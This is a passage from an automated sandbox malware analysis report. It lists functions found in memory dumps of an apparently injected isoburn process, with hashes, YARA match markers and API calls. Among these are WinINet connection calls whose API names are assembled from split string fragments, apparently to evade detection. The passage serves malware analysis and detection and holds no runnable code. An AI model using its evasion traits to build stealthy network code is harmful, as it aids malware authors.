                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 0eeb7a1e365d6276c63be324d77c105cbd7ba013c5ee6fadd2d1de2006132660
                                                                            • Instruction ID: 5e26075d0f05ac92d68413524d0cb8bc7da716e35c07e11cc7993a35d1acd81f
                                                                            • Opcode Fuzzy Hash: 0eeb7a1e365d6276c63be324d77c105cbd7ba013c5ee6fadd2d1de2006132660
                                                                            • Instruction Fuzzy Hash: 8490022260140502E5017158944465A101ACBD1241FD5C022A2024595ECB25CAA2A231
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 13b5f7427b6c002f4104b6661230856f0e4b7f7b57bee87944287b5259f6a236
                                                                            • Instruction ID: 2ec738a016e0b554dfe4719fe483da34285439f42656ac6d6d5725b612489d5f
                                                                            • Opcode Fuzzy Hash: 13b5f7427b6c002f4104b6661230856f0e4b7f7b57bee87944287b5259f6a236
                                                                            • Instruction Fuzzy Hash: 5E90026220180403E5407558984464B1015CBD1302F95C011A3064595E8B29CD616235
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 1d65baecc053445754140a678841c3aaf46ff3260778f5014472d9cf82459c0a
                                                                            • Instruction ID: 3afc697c4de4f0afada5920c58a70f468456871a7f2ea5abf6a43f8603e42c5b
                                                                            • Opcode Fuzzy Hash: 1d65baecc053445754140a678841c3aaf46ff3260778f5014472d9cf82459c0a
                                                                            • Instruction Fuzzy Hash: EC9002622024000355057158945465A501ACBE1201B95C021E20145D0DC625C9A16235
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: b643126d7f02646ac42fdf6d7d965aba27683a3a88e0f09b779796f3c018fcb9
                                                                            • Instruction ID: 388d24cee47014525a83f5c3e5ba52aa169167352c863468ae05647a8b0ab011
                                                                            • Opcode Fuzzy Hash: b643126d7f02646ac42fdf6d7d965aba27683a3a88e0f09b779796f3c018fcb9
                                                                            • Instruction Fuzzy Hash: 6D90023260540802E5507158945478A1015CBD1301F95C011A1024694D8755CB6577B1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 9bbbf0195c569f6215aaf66bbda37dfc58baa0708833e1eae49751f65e88f828
                                                                            • Instruction ID: 9b574a3dfcdc1cf2b8d7d6f72a2e7f322ce1166235af4469864c3cab65bd0a02
                                                                            • Opcode Fuzzy Hash: 9bbbf0195c569f6215aaf66bbda37dfc58baa0708833e1eae49751f65e88f828
                                                                            • Instruction Fuzzy Hash: 8390023220544842E54071589444A8A1025CBD1305F95C011A10646D4D9725CE65B771
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 71e58d8b764523273f0da08ff6a10db8a7b37ffd988b5d2079e5454148b648e3
                                                                            • Instruction ID: 7b2772b63fe7885246261af8db797fcaa27c5d50b6357f46fa4ddce9a0aa7ab8
                                                                            • Opcode Fuzzy Hash: 71e58d8b764523273f0da08ff6a10db8a7b37ffd988b5d2079e5454148b648e3
                                                                            • Instruction Fuzzy Hash: FE90023220140802E5807158944468E1015CBD2301FD5C015A1025694DCB15CB6977B1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 9402a08de548cdf3632bc572254150ae86b42953dd99fa9475d8cfba45d12bca
                                                                            • Instruction ID: 1f1159b4542296e2bfe61348dee8621bb630c5d97e33f77beba12a39ae72f7c3
                                                                            • Opcode Fuzzy Hash: 9402a08de548cdf3632bc572254150ae86b42953dd99fa9475d8cfba45d12bca
                                                                            • Instruction Fuzzy Hash: 40900226211400031505B558574454B1056CBD6351395C021F2015590CD721C9715231
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: d2f0eb655a7529b7bdab794076b56e430047b87e15afbafa7d5e4f6ebf356a86
                                                                            • Instruction ID: 1ceedab22f40127217626ce2c8d3fbd0eba854806723ab282897244b1915c8a7
                                                                            • Opcode Fuzzy Hash: d2f0eb655a7529b7bdab794076b56e430047b87e15afbafa7d5e4f6ebf356a86
                                                                            • Instruction Fuzzy Hash: 09900226221400021545B558564454F1455DBD73513D5C015F24165D0CC721C9755331
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: d4b0d0a523c87a853021db2253d2855af555cc8a1f01e2f9c8514f02cdc97af8
                                                                            • Instruction ID: 179a601dc04e3ba0ca39d160bf16c41c0aace015ab69755a85139d0cc85a08be
                                                                            • Opcode Fuzzy Hash: d4b0d0a523c87a853021db2253d2855af555cc8a1f01e2f9c8514f02cdc97af8
                                                                            • Instruction Fuzzy Hash: A190023260550402E5007158955474A2015CBD1201FA5C411A14245A8D8795CA6166B2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 543c482b3cf4d4b5d461c841b286755fc70cac08f0a1161a7982305e27d09689
                                                                            • Instruction ID: d1abb2f1e14dfbd61baf7a9806757fa4bde5bf06f3314c17aa482594b8a965ea
                                                                            • Opcode Fuzzy Hash: 543c482b3cf4d4b5d461c841b286755fc70cac08f0a1161a7982305e27d09689
                                                                            • Instruction Fuzzy Hash: 4D90022224545102E550715C944465A5015EBE1201F95C021A18145D4D8655C9656331
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 03025824 Relevance: 29.9, APIs: 3, Strings: 14, Instructions: 158networkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 030258CA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InternetOpen
                                                                            • String ID: A$ConnectA$Http$HttpOpenRequestA$InternetConnectA$InternetOpenA$Open$OpenRequestA$Requ$RequestA$ectA$estA$rnetConnectA$rnetOpenA
                                                                            • API String ID: 2038078732-2462375318
                                                                            • Opcode ID: 5452817714c2daa84cec4ce3d2a7dccd5e41ae751087edd5e33906131385f024
                                                                            • Instruction ID: 7f061c7322119ddd996b25d4b65f62f9a0d3c36bbcc5d93cfd196b11ab730295
                                                                            • Opcode Fuzzy Hash: 5452817714c2daa84cec4ce3d2a7dccd5e41ae751087edd5e33906131385f024
                                                                            • Instruction Fuzzy Hash: C3416D76A06258AFDB14DF98DC40DEFBBA9EF89710F148249FD58A7300C671AD108BE5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 030258DB Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 57networkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 697 30258db-30258dc 698 30258c3-30258d0 InternetOpenA 697->698 699 30258de-3025919 697->699 700 3025922-3025929 699->700 701 302591d call 3026280 699->701 702 3025952-3025958 700->702 703 302592b-3025951 InternetConnectA 700->703 701->700
                                                                            APIs
                                                                            • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 030258CA
                                                                            • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,?,?,?,?,?), ref: 0302594B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Internet$ConnectOpen
                                                                            • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA$rnetOpenA
                                                                            • API String ID: 2790792615-3717097293
                                                                            • Opcode ID: 2c9e0a23b4b540b81755fc3df40126a6364e31df89466c589fbc3fe3134dd704
                                                                            • Instruction ID: 6dace1c5e457f5d46a15acc597d59b0944faee30f2ff1b642aabf488a4aca011
                                                                            • Opcode Fuzzy Hash: 2c9e0a23b4b540b81755fc3df40126a6364e31df89466c589fbc3fe3134dd704
                                                                            • Instruction Fuzzy Hash: 21117CB1519158AFCB04CF98DD40DEBBBB8EB89310F04428DFD4CA7200C6759A118BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 03025960 Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,?,?,?,?,?), ref: 030259CB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: HttpOpenRequest
                                                                            • String ID: Http$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                            • API String ID: 1984915467-4071423757
                                                                            • Opcode ID: a53f010e68137af92daeea66d1fa971bd25edbc7885f1218b7d48149980b0e3c
                                                                            • Instruction ID: ce3fe68f864d9561ab752a309171c4ab60ee1a15b2c99a5326d4798bf1e4e061
                                                                            • Opcode Fuzzy Hash: a53f010e68137af92daeea66d1fa971bd25edbc7885f1218b7d48149980b0e3c
                                                                            • Instruction Fuzzy Hash: EB01EDB2505158AFCB04DF98D841DEF7BF9EB48210F158299FD48A7204D675AD10CBE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 030258E0 Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,?,?,?,?,?), ref: 0302594B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ConnectInternet
                                                                            • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                            • API String ID: 3050416762-1024195942
                                                                            • Opcode ID: 09ee44c42201e152be619114b001354a29684353d5b5879cea72806e15ea9897
                                                                            • Instruction ID: 21a15e03e8040995fa788b911edacc78049e607a52cbe956ba65ae403ff46c85
                                                                            • Opcode Fuzzy Hash: 09ee44c42201e152be619114b001354a29684353d5b5879cea72806e15ea9897
                                                                            • Instruction Fuzzy Hash: 8701DBB2915158AFCB14DF99D941DEBBBB8EB48210F154299BE48A7240D670AE10CBE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 03025959 Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 45networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,?,?,?,?,?), ref: 030259CB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: HttpOpenRequest
                                                                            • String ID: Http$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                            • API String ID: 1984915467-4071423757
                                                                            • Opcode ID: ed152f6a6868436c0f160e038e6a1ea7d195fecf80de1bb4fa6166c876a39950
                                                                            • Instruction ID: 186b31c8eae92d626ee58901ff56488d350dbad72097d294a3619bd55c051e45
                                                                            • Opcode Fuzzy Hash: ed152f6a6868436c0f160e038e6a1ea7d195fecf80de1bb4fa6166c876a39950
                                                                            • Instruction Fuzzy Hash: B0015EB2905158AFCF00DF98C881DEF7BB9EF48250F158288FD48A7305C630AE11CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 03025870 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 030258CA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InternetOpen
                                                                            • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                            • API String ID: 2038078732-3155091674
                                                                            • Opcode ID: dfb678c8f92943d01b7d85fa9f9be9ccfe7264b614b24c50130d97bdf7956ac5
                                                                            • Instruction ID: d58abb130ff840af173f5b8984658d388cb751d56572716c591dda2966149224
                                                                            • Opcode Fuzzy Hash: dfb678c8f92943d01b7d85fa9f9be9ccfe7264b614b24c50130d97bdf7956ac5
                                                                            • Instruction Fuzzy Hash: EA011DB2911128AF8B10DF98DC419FBB7B8FF48310F048589FD18A7241D675AA10CBE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0302586F Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 36networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 030258CA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InternetOpen
                                                                            • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                            • API String ID: 2038078732-3155091674
                                                                            • Opcode ID: 9399f14bde64643c773783530733c3fd6ff2abecf1c2f87801eee2a4054fbe2f
                                                                            • Instruction ID: e9fbe574e638b7283afa70885f75e5f6a74b7520bdbe36a33c40905992171af5
                                                                            • Opcode Fuzzy Hash: 9399f14bde64643c773783530733c3fd6ff2abecf1c2f87801eee2a4054fbe2f
                                                                            • Instruction Fuzzy Hash: 10F03CB2901128AF8B00DF98D8419FBBBB8FF48300F048589FE186B241D274AA10CBE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 030107BA Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 7e327r58$7e327r58
                                                                            • API String ID: 0-4105805501
                                                                            • Opcode ID: 82402712a0b75521e6a14b9bc05d97eac04ab03830922f2e319dfe6e1bd53444
                                                                            • Instruction ID: 5aec7380eb1721b520de45f53b1ed9111ec3e9e79b10c4dcada0111dbadaa8cb
                                                                            • Opcode Fuzzy Hash: 82402712a0b75521e6a14b9bc05d97eac04ab03830922f2e319dfe6e1bd53444
                                                                            • Instruction Fuzzy Hash: 3B41AD3794B289EFD702D7749C419EEBFA8EF81224B18429DE4C08B502D2628597C7C1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 03010918 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62threadwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostThreadMessageW.USER32(7e327r58,00000111,00000000,00000000), ref: 03010997
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID: 7e327r58$7e327r58
                                                                            • API String ID: 1836367815-4105805501
                                                                            • Opcode ID: 9349526b6208127e1f10d187c497c14efb34eac3166d3264b5f612306709c727
                                                                            • Instruction ID: d3bdb94083bea5225c57825e6435dada4aec16f43b6975125866c94ba17cd090
                                                                            • Opcode Fuzzy Hash: 9349526b6208127e1f10d187c497c14efb34eac3166d3264b5f612306709c727
                                                                            • Instruction Fuzzy Hash: D801CC76D0125C7EEB11EAD48C81DFF7B7CDF80694F048154FA446B140D6385E468BB1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 03010920 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostThreadMessageW.USER32(7e327r58,00000111,00000000,00000000), ref: 03010997
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID: 7e327r58$7e327r58
                                                                            • API String ID: 1836367815-4105805501
                                                                            • Opcode ID: e486c9899747edec20a59d0c4dc92b630a3ca3456ed4f9838f46d68ac4a78ee6
                                                                            • Instruction ID: a0be4e2f605c8844582a80bdf90d8901c779a745d79c3431b6feec0e6b0fcf52
                                                                            • Opcode Fuzzy Hash: e486c9899747edec20a59d0c4dc92b630a3ca3456ed4f9838f46d68ac4a78ee6
                                                                            • Instruction Fuzzy Hash: 8901BE76D0225C7EEB11DAE58CC1DEF7B7CDF80694F048164FA44AB240D5385E468BB1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 03022450 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000007D0), ref: 0302251B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID: net.dll$wininet.dll
                                                                            • API String ID: 3472027048-1269752229
                                                                            • Opcode ID: 7aca81c9b1ad061a9b03743802ed5ffce7ad92d42c2551175fd1bf15eb71ab2f
                                                                            • Instruction ID: 751ad6daf0b4452b3485207663a770e9b7645abee9ed2ffd8a46edf72e25934b
                                                                            • Opcode Fuzzy Hash: 7aca81c9b1ad061a9b03743802ed5ffce7ad92d42c2551175fd1bf15eb71ab2f
                                                                            • Instruction Fuzzy Hash: A931A1B9601704ABD714DFA4D884FA7BBFCEB88300F04862EEA5D9B244D270A554CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 03022448 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 95sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000007D0), ref: 0302251B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID: net.dll$wininet.dll
                                                                            • API String ID: 3472027048-1269752229
                                                                            • Opcode ID: b5fa294a1198c32d6f00906cc7d32fa1e79b890f799487c8292c6fa8aa460fd7
                                                                            • Instruction ID: 7c20b3c8701cef09f42b222e558179687e4d6965cda7ca7b4a925fc0e6350f67
                                                                            • Opcode Fuzzy Hash: b5fa294a1198c32d6f00906cc7d32fa1e79b890f799487c8292c6fa8aa460fd7
                                                                            • Instruction Fuzzy Hash: C731D1B8601300BBD714DFA4D885FEAFBB8AF48300F048629EA5C5B285D3706554CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 03018B71 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 03018C76
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
